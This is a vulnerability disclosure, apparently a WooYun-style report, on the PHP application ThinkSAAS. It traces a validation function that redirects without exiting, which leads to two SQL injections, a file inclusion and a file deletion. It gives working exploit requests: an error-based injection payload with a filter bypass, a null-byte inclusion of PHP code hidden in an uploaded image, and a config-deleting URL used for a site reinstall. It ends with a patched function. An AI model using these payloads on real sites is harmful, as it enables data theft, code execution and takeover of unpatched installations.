Pack the latest version of ThinkSAAS Vulnerability

Source: Internet
Author: User


SQL injection + file inclusion + ...

Following xfkxfk's example, I am packing several vulnerabilities together and want to try the major-vendor process.

In the latest version, the tsUrlCheck() function is the root cause of multiple vulnerabilities.

\thinksaas\tsFunction.php

    function tsUrlCheck($parameter) {
        $parameter = trim($parameter);
        //echo $parameter; exit();
        $arrStr = str_split($parameter);
        $strOk = '%-_1234567890abcdefghijklmnopqrstuvwxyz';
        foreach ($arrStr as $key => $item) {
            if (stripos($strOk, $item) === false) {
                //qiMsg('Invalid URL parameter!');
                header('location:/');   // redirect, but the script is not terminated
            }
        }
        return $parameter;              // the rejected value is still returned to the caller
    }



The function checks whether the input parameter contains any character outside the $strOk whitelist and, if it does, redirects with header().

However, exit() is never called after the header, so the script keeps running and the tainted parameter is still returned.

So there is a problem!

1. SQL injection:

\app\tag\action\add.php

    case "do":
        $objname = tsFilter($_POST['objname']);
        $idname  = tsFilter($_POST['idname']);
        $objid   = intval($_POST['objid']);
        $tags    = t($_POST['tags']);
        $new['tag']->addTag($objname, $idname, $objid, $tags);



$objname and $idname are controllable, and tsFilter() performs only simple filtering that can be bypassed. For details, see: WooYun: ThinkSAAS latest version bypasses filtering and continues injection.

Both controllable variables then enter addTag().

\app\tag\class.tag.php

    function addTag($objname, $idname, $objid, $tags) {
        $objname = tsUrlCheck($objname);
        $idname  = tsUrlCheck($idname);
        $objid   = intval($objid);
        if ($objname != '' && $idname != '' && $objid != 0 && $tags != '') {
            $tags   = str_replace('，', ',', $tags);   // full-width comma to ASCII comma
            $arrTag = explode(',', $tags);
            foreach ($arrTag as $item) {
                $tagname = t($item);
                if (strlen($tagname) < '32' && $tagname != '') {
                    $uptime   = time();
                    $tagcount = $this->findCount('tag', array('tagname' => $tagname,));
                    if ($tagcount == '0') {
                        $tagid = $this->create('tag', array(
                            'tagname' => $tagname,
                            'uptime'  => $uptime,
                        ));
                        $tagIndexCount = $this->findCount('tag_' . $objname . '_index', array(
                            $idname => $objid,
                            'tagid' => $tagid,
                        ));
                        ...



$objname and $idname reach $this->findCount().

$objname becomes part of the table name, and $idname is used as the array key passed to findCount().

Following findCount() shows that the key is neither filtered nor enclosed in quotation marks, so it is not subject to GPC (magic_quotes_gpc) restrictions.

Because the header redirect happens here and ThinkSAAS does not return an error, another method is needed to retrieve the injection result.

Reference: WooYun: ThinkSAAS latest injection ignoring GPC

From that report we know that all MySQL error messages in ThinkSAAS are recorded in a log file, so error-based injection can succeed.



2. SQL injection:

\app\tag\action\add_ajax.php

    case "do":
        $objname = tsUrlCheck($_POST['objname']);
        $idname  = tsUrlCheck($_POST['idname']);
        $objid   = intval($_POST['objid']);
        $tags    = t($_POST['tags']);
        $new['tag']->addTag($objname, $idname, $objid, $tags);



Here tsUrlCheck() is applied directly to the POST data and tsFilter() is not used at all. The rest of the analysis is the same as in 1.

3. Arbitrary file inclusion:

\thinksaas.php

    $app = isset($_GET['app']) ? tsUrlCheck($_GET['app']) : 'home';
    ...
    include 'app/' . $app . '/config.php';



The GET parameter passes only through the ineffective tsUrlCheck() check before being included.

Therefore, arbitrary files can be included directly by truncation.

4. Arbitrary file deletion:

\app\system\action\plugin.php

    case "delete":
        $apps  = tsUrlCheck($_GET['apps']);
        $pname = tsUrlCheck($_GET['pname']);
        delDir('plugins/' . $apps . '/' . $pname);



Similarly, $apps and $pname pass only through tsUrlCheck() before reaching the dangerous function delDir(). Both variables are controllable and no truncation is needed: whatever path is supplied is deleted.

However, this action is administrator-only, so it has to be combined with CSRF.

1. Injection:

The following demonstrates the first (more complex) SQL injection, with the exp:

Exp: http://192.168.226.131/thinksaas/index.php?app=tag&ac=add&ts=do

objname=article&idname=1=1 anand d (selselect ect 1 frfrom om(selselect ect cocount unt(*),concat((selselect ect (selselect ect (selselect ect user())) frfrom om information_schema.tables limit 0,1),floor(rand(0)*2))x frfrom om information_schema.tables group bby y x)a)/*&objid=3&tags=5

2. File Inclusion:

First, upload an image with PHP code embedded in it through the avatar upload.

Next, access the following URL:

http://192.168.226.131/thinksaas/index.php?app=../cache/user/0/0/120/2.jpg%00a

A 1.php file is generated in the root directory.

3. Arbitrary file deletion:

Access as an administrator:

http://192.168.226.131/thinksaas/index.php?app=system&ac=plugin&ts=delete&apps=...&pname=data/config.inc.php

ThinkSAAS decides whether it has been installed by checking whether config.inc.php exists, so once the file is deleted the site can be reinstalled.

Solution:

Remember to call exit() after the header.
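A patched tsUrlCheck(), as an added example rather than ThinkSAAS's own fix: the whitelist test is split into a pure helper (tsUrlIsSafe(), a name assumed here) and the redirect is followed by exit(), so none of the call sites above can receive a rejected value.

```php
<?php
// Added example, not ThinkSAAS's own code: tsUrlCheck() rewritten around a pure
// validator (tsUrlIsSafe, an assumed name) so the whitelist decision can be reused
// and tested, with exit() added after the redirect as recommended above.

// Returns true only if every character of $parameter is in the original whitelist
// (percent sign, dash, underscore, digits and letters; stripos made the original
// check case-insensitive, so uppercase letters are accepted as well).
function tsUrlIsSafe($parameter)
{
    $parameter = trim($parameter);
    $strOk = '%-_1234567890abcdefghijklmnopqrstuvwxyz';
    if ($parameter === '') {
        return true;   // choice made in this example; callers already test for ''
    }
    foreach (str_split($parameter) as $item) {
        if (stripos($strOk, $item) === false) {
            return false;
        }
    }
    return true;
}

// Patched tsUrlCheck(): redirect AND stop. Without exit() the Location header is
// sent but the script keeps running, so addTag(), include 'app/' . $app . '/config.php'
// and delDir() would still receive the rejected value.
function tsUrlCheck($parameter)
{
    $parameter = trim($parameter);
    if (!tsUrlIsSafe($parameter)) {
        header('location:/');
        exit();   // the line that was missing
    }
    return $parameter;
}

// Constructed sample values modelled on the cases analysed above, run from the CLI.
if (PHP_SAPI === 'cli') {
    $samples = array(
        'article',                          // legitimate objname
        '1=1 and 2=2',                      // injection shape: spaces and '=' are rejected
        '../cache/user/0/0/120/2.jpg%00a',  // inclusion path: '.' and '/' are rejected
        'data/config.inc.php',              // deletion path: '/' and '.' are rejected
    );
    foreach ($samples as $s) {
        printf("%-40s %s\n", $s, tsUrlIsSafe($s) ? 'accepted' : 'rejected');
    }
}
```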
